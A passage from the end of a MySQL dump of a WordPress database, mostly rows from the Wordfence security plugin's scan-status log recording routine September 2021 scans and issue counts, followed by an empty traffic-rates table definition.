files'),(5761,1631305506.026239,10,'info','SUM_START:Scanning for admin users not created through WordPress'),(5762,1631305506.633815,10,'info','SUM_ENDOK:Scanning for admin users not created through WordPress'),(5763,1631305506.656376,10,'info','SUM_START:Scanning for suspicious site options'),(5764,1631305506.814572,2,'info','Examining URLs found in the options we scanned for dangerous websites'),(5765,1631305506.816659,2,'info','Done examining URLs'),(5766,1631305506.857478,10,'info','SUM_ENDOK:Scanning for suspicious site options'),(5767,1631305506.875504,1,'info','-------------------'),(5768,1631305506.878687,2,'info','Wordfence used 21.6 MB of memory for scan. Server peak memory usage was: 43.6 MB'),(5769,1631305506.882259,1,'info','Scan Complete. Scanned 7061 files, 5 plugins, 31 themes, 13 posts, 0 comments and 3841 URLs in 4 minutes 13 seconds.'),(5770,1631305506.885048,10,'info','SUM_FINAL:Scan complete. You have 1255 new issues to fix. See below.'),(5771,1631356512.461723,10,'info','SUM_PREP:Preparing a new scan.'),(5772,1631356512.510918,1,'info','Initiating quick scan'),(5773,1631356512.552786,10,'info','SUM_START:Checking Web Application Firewall status'),(5774,1631356512.564098,10,'info','SUM_ENDOK:Checking Web Application Firewall status'),(5775,1631356512.604567,10,'info','SUM_START:Scanning for old themes, plugins and core files'),(5776,1631356513.098939,10,'info','SUM_ENDBAD:Scanning for old themes, plugins and core files'),(5777,1631356513.123039,1,'info','-------------------'),(5778,1631356513.148125,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 22 MB'),(5779,1631356513.159634,1,'info','Quick Scan Complete. Scanned in 1 second.'),(5780,1631356513.173011,10,'info','SUM_FINAL:Scan complete. You have 27 new issues to fix. See below.'),(5781,1631443091.851533,10,'info','SUM_PREP:Preparing a new scan.'),(5782,1631443091.908056,1,'info','Initiating quick scan'),(5783,1631443091.946971,10,'info','SUM_START:Checking Web Application Firewall status'),(5784,1631443091.959157,10,'info','SUM_ENDOK:Checking Web Application Firewall status'),(5785,1631443091.993556,10,'info','SUM_START:Scanning for old themes, plugins and core files'),(5786,1631443092.356319,10,'info','SUM_ENDBAD:Scanning for old themes, plugins and core files'),(5787,1631443092.375604,1,'info','-------------------'),(5788,1631443092.389807,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 22 MB'),(5789,1631443092.401145,1,'info','Quick Scan Complete. Scanned in 1 second.'),(5790,1631443092.409698,10,'info','SUM_FINAL:Scan complete. You have 27 new issues to fix. See below.'),(5791,1631529745.201177,10,'info','SUM_PREP:Preparing a new scan.'),(5792,1631529745.261216,1,'info','Initiating quick scan'),(5793,1631529745.284713,10,'info','SUM_START:Checking Web Application Firewall status'),(5794,1631529745.290342,10,'info','SUM_ENDOK:Checking Web Application Firewall status'),(5795,1631529745.316064,10,'info','SUM_START:Scanning for old themes, plugins and core files'),(5796,1631529745.557004,10,'info','SUM_ENDBAD:Scanning for old themes, plugins and core files'),(5797,1631529745.569402,1,'info','-------------------'),(5798,1631529745.604921,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 22 MB'),(5799,1631529745.614921,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(5800,1631529745.616894,10,'info','SUM_FINAL:Scan complete. You have 27 new issues to fix. See below.'),(5801,1631564497.100725,1,'info','Scheduled Wordfence scan starting at Monday 13th of September 2021 08:21:37 PM'),(5802,1631564497.585560,10,'info','SUM_PREP:Preparing a new scan.'),(5803,1631564497.607232,1,'info','Contacting Wordfence to initiate scan'),(5804,1631564498.744700,10,'info','SUM_PAIDONLY:Check if your site is being Spamvertized is for paid members only'),(5805,1631564500.865173,10,'info','SUM_PAIDONLY:Checking if your IP is generating spam is for paid members only'),(5806,1631564502.906500,10,'info','SUM_PAIDONLY:Checking if your site is on a domain blocklist is for paid members only'),(5807,1631564504.986020,10,'info','SUM_START:Checking for the most secure way to get IPs'),(5808,1631564505.018615,10,'info','SUM_ENDOK:Checking for the most secure way to get IPs'),(5809,1631564505.062593,10,'info','SUM_START:Scanning to check available disk space'),(5810,1631564505.090369,2,'info','Total disk space: 3.58 TB -- Free disk space: 3.3 TB'),(5811,1631564505.097252,2,'info','The disk has 3456786.48 MB available'),(5812,1631564505.107396,10,'info','SUM_ENDOK:Scanning to check available disk space'),(5813,1631564505.145230,10,'info','SUM_START:Checking Web Application Firewall status'),(5814,1631564505.160610,10,'info','SUM_ENDOK:Checking Web Application Firewall status'),(5815,1631564505.201267,10,'info','SUM_START:Checking for future GeoIP support'),(5816,1631564505.224158,10,'info','SUM_ENDOK:Checking for future GeoIP support'),(5817,1631564505.260112,10,'info','SUM_START:Checking for paths skipped due to scan settings'),(5818,1631564505.281344,10,'info','SUM_ENDOK:Checking for paths skipped due to scan settings'),(5819,1631564505.332388,2,'info','Getting plugin list from WordPress'),(5820,1631564505.340342,2,'info','Found 4 plugins'),(5821,1631564505.350345,2,'info','Getting theme list from WordPress'),(5822,1631564505.355314,2,'info','Found 31 themes'),(5823,1631564505.817905,10,'info','SUM_START:Fetching core, theme and plugin file signatures from Wordfence'),(5824,1631564507.219896,10,'info','SUM_ENDSUCCESS:Fetching core, theme and plugin file signatures from Wordfence'),(5825,1631564507.279881,10,'info','SUM_START:Fetching list of known malware files from Wordfence'),(5826,1631564507.292357,10,'info','SUM_ENDSUCCESS:Fetching list of known malware files from Wordfence'),(5827,1631564507.335255,10,'info','SUM_START:Fetching list of known core files from Wordfence'),(5828,1631564507.346918,10,'info','SUM_ENDSUCCESS:Fetching list of known core files from Wordfence'),(5829,1631564507.396909,10,'info','SUM_START:Comparing core WordPress files against originals in repository'),(5830,1631564507.401445,10,'info','SUM_DISABLED:Skipping theme scan'),(5831,1631564507.403278,10,'info','SUM_DISABLED:Skipping plugin scan'),(5832,1631564507.407343,10,'info','SUM_START:Scanning for known malware files'),(5833,1631564507.414375,10,'info','SUM_START:Scanning for unknown files in wp-admin and wp-includes'),(5834,1631564507.442438,2,'info','500 files indexed'),(5835,1631564507.496600,2,'info','1000 files indexed'),(5836,1631564507.562561,2,'info','1500 files indexed'),(5837,1631564507.644993,2,'info','2000 files indexed'),(5838,1631564507.818366,2,'info','2500 files indexed'),(5839,1631564507.861795,2,'info','3000 files indexed'),(5840,1631564507.919406,2,'info','3500 files indexed'),(5841,1631564507.994384,2,'info','4000 files indexed'),(5842,1631564508.075162,2,'info','4500 files indexed'),(5843,1631564508.167587,2,'info','5000 files indexed'),(5844,1631564508.244948,2,'info','5500 files indexed'),(5845,1631564508.302980,2,'info','6000 files indexed'),(5846,1631564508.407170,2,'info','6500 files indexed'),(5847,1631564508.653593,2,'info','7000 files indexed'),(5848,1631564508.675817,2,'info','7061 files indexed'),(5849,1631564511.867321,2,'info','Analyzed 100 files containing 1.65 MB of data so far'),(5850,1631564515.562153,2,'info','Analyzed 200 files containing 3.22 MB of data so far'),(5851,1631564518.746158,2,'info','Analyzed 300 files containing 4.52 MB of data so far'),(5852,1631564521.735428,2,'info','Analyzed 400 files containing 7.21 MB of data so far'),(5853,1631564524.096208,2,'info','Analyzed 500 files containing 8.09 MB of data so far'),(5854,1631564528.088600,2,'info','Analyzed 600 files containing 8.94 MB of data so far'),(5855,1631564532.430658,2,'info','Analyzed 700 files containing 10.07 MB of data so far'),(5856,1631564535.275178,2,'info','Analyzed 800 files containing 11.1 MB of data so far'),(5857,1631564538.727903,2,'info','Analyzed 900 files containing 12.87 MB of data so far'),(5858,1631564542.731471,2,'info','Analyzed 1000 files containing 18.33 MB of data so far'),(5859,1631564545.483526,2,'info','Analyzed 1100 files containing 19.81 MB of data so far'),(5860,1631564548.884448,2,'info','Analyzed 1200 files containing 21.37 MB of data so far'),(5861,1631564551.668403,2,'info','Analyzed 1300 files containing 21.71 MB of data so far'),(5862,1631564554.568930,2,'info','Analyzed 1400 files containing 22.65 MB of data so far'),(5863,1631564559.571826,2,'info','Analyzed 1500 files containing 22.68 MB of data so far'),(5864,1631564561.768839,2,'info','Analyzed 1600 files containing 22.71 MB of data so far'),(5865,1631564564.853422,2,'info','Analyzed 1700 files containing 24.06 MB of data so far'),(5866,1631564567.892326,2,'info','Analyzed 1800 files containing 24.7 MB of data so far'),(5867,1631564569.917482,2,'info','Analyzed 1900 files containing 27.12 MB of data so far'),(5868,1631564571.283474,2,'info','Analyzed 2000 files containing 27.51 MB of data so far'),(5869,1631564572.978174,2,'info','Analyzed 2100 files containing 28.11 MB of data so far'),(5870,1631564575.761612,2,'info','Analyzed 2200 files containing 30.3 MB of data so far'),(5871,1631564577.391945,2,'info','Analyzed 2300 files containing 32.73 MB of data so far'),(5872,1631564579.697590,2,'info','Analyzed 2400 files containing 34.44 MB of data so far'),(5873,1631564581.093692,2,'info','Analyzed 2500 files containing 35.38 MB of data so far'),(5874,1631564582.626957,2,'info','Analyzed 2600 files containing 36.27 MB of data so far'),(5875,1631564585.358679,2,'info','Analyzed 2700 files containing 39.94 MB of data so far'),(5876,1631564586.648414,2,'info','Analyzed 2800 files containing 41.31 MB of data so far'),(5877,1631564588.974029,2,'info','Analyzed 2900 files containing 43.39 MB of data so far'),(5878,1631564591.074988,2,'info','Analyzed 3000 files containing 46.43 MB of data so far'),(5879,1631564593.057553,2,'info','Analyzed 3100 files containing 48.47 MB of data so far'),(5880,1631564595.881011,2,'info','Analyzed 3200 files containing 53.86 MB of data so far'),(5881,1631564597.580332,2,'info','Analyzed 3300 files containing 54.73 MB of data so far'),(5882,1631564599.324264,2,'info','Analyzed 3400 files containing 55.15 MB of data so far'),(5883,1631564602.888105,2,'info','Analyzed 3500 files containing 57.01 MB of data so far'),(5884,1631564606.227823,2,'info','Analyzed 3600 files containing 58.95 MB of data so far'),(5885,1631564607.808291,2,'info','Analyzed 3700 files containing 61.75 MB of data so far'),(5886,1631564609.394321,2,'info','Analyzed 3800 files containing 62.85 MB of data so far'),(5887,1631564612.056179,2,'info','Analyzed 3900 files containing 65.39 MB of data so far'),(5888,1631564614.124825,2,'info','Analyzed 4000 files containing 71.97 MB of data so far'),(5889,1631564616.041028,2,'info','Analyzed 4100 files containing 73.58 MB of data so far'),(5890,1631564618.813717,2,'info','Analyzed 4200 files containing 77.06 MB of data so far'),(5891,1631564620.920294,2,'info','Analyzed 4300 files containing 78.51 MB of data so far'),(5892,1631564623.095180,2,'info','Analyzed 4400 files containing 79.56 MB of data so far'),(5893,1631564624.619180,2,'info','Analyzed 4500 files containing 81.16 MB of data so far'),(5894,1631564627.285651,2,'info','Analyzed 4600 files containing 84.74 MB of data so far'),(5895,1631564630.727628,2,'info','Analyzed 4700 files containing 85.53 MB of data so far'),(5896,1631564633.238579,2,'info','Analyzed 4800 files containing 86.32 MB of data so far'),(5897,1631564636.415203,2,'info','Analyzed 4900 files containing 88.26 MB of data so far'),(5898,1631564639.579519,2,'info','Analyzed 5000 files containing 90.83 MB of data so far'),(5899,1631564643.197198,2,'info','Analyzed 5100 files containing 92.27 MB of data so far'),(5900,1631564646.839198,2,'info','Analyzed 5200 files containing 101.21 MB of data so far'),(5901,1631564650.448953,2,'info','Analyzed 5300 files containing 107.19 MB of data so far'),(5902,1631564654.324235,2,'info','Analyzed 5400 files containing 108.53 MB of data so far'),(5903,1631564657.923923,2,'info','Analyzed 5500 files containing 110.94 MB of data so far'),(5904,1631564661.468727,2,'info','Analyzed 5600 files containing 114.92 MB of data so far'),(5905,1631564666.163036,2,'info','Analyzed 5700 files containing 116.73 MB of data so far'),(5906,1631564669.407970,2,'info','Analyzed 5800 files containing 118.08 MB of data so far'),(5907,1631564673.090025,2,'info','Analyzed 5900 files containing 120.03 MB of data so far'),(5908,1631564676.784964,2,'info','Analyzed 6000 files containing 120.74 MB of data so far'),(5909,1631564680.932960,2,'info','Analyzed 6100 files containing 122.27 MB of data so far'),(5910,1631564685.212604,2,'info','Analyzed 6200 files containing 125.28 MB of data so far'),(5911,1631564688.352748,2,'info','Analyzed 6300 files containing 126.95 MB of data so far'),(5912,1631564692.277216,2,'info','Analyzed 6400 files containing 128.56 MB of data so far'),(5913,1631564695.970376,2,'info','Analyzed 6500 files containing 139.27 MB of data so far'),(5914,1631564699.583025,2,'info','Analyzed 6600 files containing 142.81 MB of data so far'),(5915,1631564704.712100,2,'info','Analyzed 6700 files containing 145.05 MB of data so far'),(5916,1631564708.796247,2,'info','Analyzed 6800 files containing 147.84 MB of data so far'),(5917,1631564712.333044,2,'info','Analyzed 6900 files containing 150.92 MB of data so far'),(5918,1631564717.292899,2,'info','Analyzed 7000 files containing 152.07 MB of data so far'),(5919,1631564719.980466,2,'info','Analyzed 7061 files containing 153.17 MB of data.'),(5920,1631564719.990816,10,'info','SUM_ENDOK:Comparing core WordPress files against originals in repository'),(5921,1631564720.025768,10,'info','SUM_ENDBAD:Scanning for unknown files in wp-admin and wp-includes'),(5922,1631564720.101215,10,'info','SUM_ENDOK:Scanning for known malware files'),(5923,1631564720.156550,10,'info','SUM_START:Check for publicly accessible configuration files, backup files and logs'),(5924,1631564720.195936,10,'info','SUM_ENDOK:Check for publicly accessible configuration files, backup files and logs'),(5925,1631564720.231841,10,'info','SUM_START:Scanning file contents for infections and vulnerabilities'),(5926,1631564720.259840,10,'info','SUM_START:Scanning file contents for URLs on a domain blocklist'),(5927,1631564721.773121,2,'info','Starting scan of file contents'),(5928,1631564722.808652,2,'info','Scanned contents of 12 additional files at 11.73 per second'),(5929,1631564723.815955,2,'info','Scanned contents of 50 additional files at 24.63 per second'),(5930,1631564724.850289,2,'info','Scanned contents of 101 additional files at 32.96 per second'),(5931,1631564725.884844,2,'info','Scanned contents of 135 additional files at 32.93 per second'),(5932,1631564726.929210,2,'info','Scanned contents of 186 additional files at 36.16 per second'),(5933,1631564727.932100,2,'info','Scanned contents of 213 additional files at 34.66 per second'),(5934,1631564728.941068,2,'info','Scanned contents of 244 additional files at 34.10 per second'),(5935,1631564730.055220,2,'info','Scanned contents of 280 additional files at 33.86 per second'),(5936,1631564731.070363,2,'info','Scanned contents of 312 additional files at 33.60 per second'),(5937,1631564732.088598,2,'info','Scanned contents of 362 additional files at 35.14 per second'),(5938,1631564733.103146,2,'info','Scanned contents of 391 additional files at 34.55 per second'),(5939,1631564734.112618,2,'info','Scanned contents of 436 additional files at 35.37 per second'),(5940,1631564735.163746,2,'info','Scanned contents of 474 additional files at 35.43 per second'),(5941,1631564736.235968,2,'info','Scanned contents of 508 additional files at 35.16 per second'),(5942,1631564737.236391,2,'info','Scanned contents of 540 additional files at 34.95 per second'),(5943,1631564738.678709,2,'info','Scanned contents of 562 additional files at 33.27 per second'),(5944,1631564739.787814,2,'info','Scanned contents of 583 additional files at 32.39 per second'),(5945,1631564740.811040,2,'info','Scanned contents of 601 additional files at 31.59 per second'),(5946,1631564741.848535,2,'info','Scanned contents of 633 additional files at 31.55 per second'),(5947,1631564742.849436,2,'info','Scanned contents of 674 additional files at 32.00 per second'),(5948,1631564743.860046,2,'info','Scanned contents of 695 additional files at 31.48 per second'),(5949,1631564744.878713,2,'info','Scanned contents of 715 additional files at 30.96 per second'),(5950,1631564745.891781,2,'info','Scanned contents of 738 additional files at 30.61 per second'),(5951,1631564746.957247,2,'info','Scanned contents of 760 additional files at 30.19 per second'),(5952,1631564747.963751,2,'info','Scanned contents of 793 additional files at 30.29 per second'),(5953,1631564748.995009,2,'info','Scanned contents of 835 additional files at 30.69 per second'),(5954,1631564750.062993,2,'info','Scanned contents of 874 additional files at 30.91 per second'),(5955,1631564751.075186,2,'info','Scanned contents of 906 additional files at 30.93 per second'),(5956,1631564752.090564,2,'info','Scanned contents of 931 additional files at 30.72 per second'),(5957,1631564753.132899,2,'info','Scanned contents of 955 additional files at 30.47 per second'),(5958,1631564754.614512,2,'info','Scanned contents of 987 additional files at 30.07 per second'),(5959,1631564755.625333,2,'info','Scanned contents of 1026 additional files at 30.32 per second'),(5960,1631564756.633076,2,'info','Scanned contents of 1061 additional files at 30.45 per second'),(5961,1631564757.659615,2,'info','Scanned contents of 1085 additional files at 30.24 per second'),(5962,1631564758.809365,2,'info','Scanned contents of 1092 additional files at 29.49 per second'),(5963,1631564759.814515,2,'info','Scanned contents of 1130 additional files at 29.71 per second'),(5964,1631564760.820174,2,'info','Scanned contents of 1165 additional files at 29.85 per second'),(5965,1631564761.844420,2,'info','Scanned contents of 1205 additional files at 30.08 per second'),(5966,1631564762.863516,2,'info','Scanned contents of 1232 additional files at 29.99 per second'),(5967,1631564763.876028,2,'info','Scanned contents of 1260 additional files at 29.94 per second'),(5968,1631564764.887969,2,'info','Scanned contents of 1289 additional files at 29.91 per second'),(5969,1631564765.577972,2,'info','Scanned contents of 1316 additional files at 30.05 per second'),(5970,1631564765.579888,2,'info','Asking Wordfence to check URLs against malware list.'),(5971,1631564765.591016,2,'info','Checking 3281 host keys against Wordfence scanning servers.'),(5972,1631564766.367727,2,'info','Done host key check.'),(5973,1631564766.558648,2,'info','Done file contents scan'),(5974,1631564766.570196,10,'info','SUM_ENDOK:Scanning file contents for infections and vulnerabilities'),(5975,1631564766.594479,10,'info','SUM_ENDOK:Scanning file contents for URLs on a domain blocklist'),(5976,1631564766.638258,10,'info','SUM_START:Scanning for publicly accessible quarantined files'),(5977,1631564766.662775,10,'info','SUM_ENDOK:Scanning for publicly accessible quarantined files'),(5978,1631564766.725164,10,'info','SUM_START:Scanning posts for URLs on a domain blocklist'),(5979,1631564766.882742,2,'info','Examining URLs found in posts we scanned for dangerous websites'),(5980,1631564766.907984,2,'info','Checking 373 host keys against Wordfence scanning servers.'),(5981,1631564767.670078,2,'info','Done host key check.'),(5982,1631564767.702477,2,'info','Done examining URLs'),(5983,1631564767.822896,10,'info','SUM_ENDOK:Scanning posts for URLs on a domain blocklist'),(5984,1631564767.858063,10,'info','SUM_START:Scanning comments for URLs on a domain blocklist'),(5985,1631564768.035111,10,'info','SUM_ENDOK:Scanning comments for URLs on a domain blocklist'),(5986,1631564768.146172,10,'info','SUM_START:Scanning for weak passwords'),(5987,1631564768.195123,2,'info','Starting password strength check on 0 users.'),(5988,1631564768.203852,10,'info','SUM_ENDOK:Scanning for weak passwords'),(5989,1631564768.258217,10,'info','SUM_START:Scanning for old themes, plugins and core files'),(5990,1631564772.080272,10,'info','SUM_ENDBAD:Scanning for old themes, plugins and core files'),(5991,1631564772.155188,10,'info','SUM_START:Scanning for admin users not created through WordPress'),(5992,1631564772.791031,10,'info','SUM_ENDOK:Scanning for admin users not created through WordPress'),(5993,1631564772.809477,10,'info','SUM_START:Scanning for suspicious site options'),(5994,1631564772.992480,2,'info','Examining URLs found in the options we scanned for dangerous websites'),(5995,1631564772.995597,2,'info','Done examining URLs'),(5996,1631564773.068981,10,'info','SUM_ENDOK:Scanning for suspicious site options'),(5997,1631564773.087648,1,'info','-------------------'),(5998,1631564773.089806,2,'info','Wordfence used 21.59 MB of memory for scan. Server peak memory usage was: 43.59 MB'),(5999,1631564773.091622,1,'info','Scan Complete. Scanned 7061 files, 5 plugins, 31 themes, 13 posts, 0 comments and 3841 URLs in 4 minutes 35 seconds.'),(6000,1631564773.093435,10,'info','SUM_FINAL:Scan complete. You have 1255 new issues to fix. See below.'),(6001,1631615573.585235,10,'info','SUM_PREP:Preparing a new scan.'),(6002,1631615573.626821,1,'info','Initiating quick scan'),(6003,1631615573.679255,10,'info','SUM_START:Checking Web Application Firewall status'),(6004,1631615573.700254,10,'info','SUM_ENDOK:Checking Web Application Firewall status'),(6005,1631615573.767889,10,'info','SUM_START:Scanning for old themes, plugins and core files'),(6006,1631615574.231639,10,'info','SUM_ENDBAD:Scanning for old themes, plugins and core files'),(6007,1631615574.253519,1,'info','-------------------'),(6008,1631615574.274112,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 22 MB'),(6009,1631615574.284310,1,'info','Quick Scan Complete. Scanned in 1 second.'),(6010,1631615574.286361,10,'info','SUM_FINAL:Scan complete. You have 26 new issues to fix. See below.');
/*!40000 ALTER TABLE `wp_wfstatus` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_wftrafficrates`
--
DROP TABLE IF EXISTS `wp_wftrafficrates`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wftrafficrates` (
`eMin` int(10) unsigned NOT NULL,
`IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
`hitType` enum('hit','404') NOT NULL DEFAULT 'hit',
`hits` int(10) unsigned NOT NULL,
PRIMARY KEY (`eMin`,`IP`,`hitType`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_wftrafficrates`
--
LOCK TABLES `wp_wftrafficrates` WRITE;
/*!40000 ALTER TABLE `wp_wftrafficrates` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wftrafficrates` ENABLE KEYS */;
UNLOCK TABLES;
/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;
/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;
-- Dump completed on 2023-02-01 0:06:01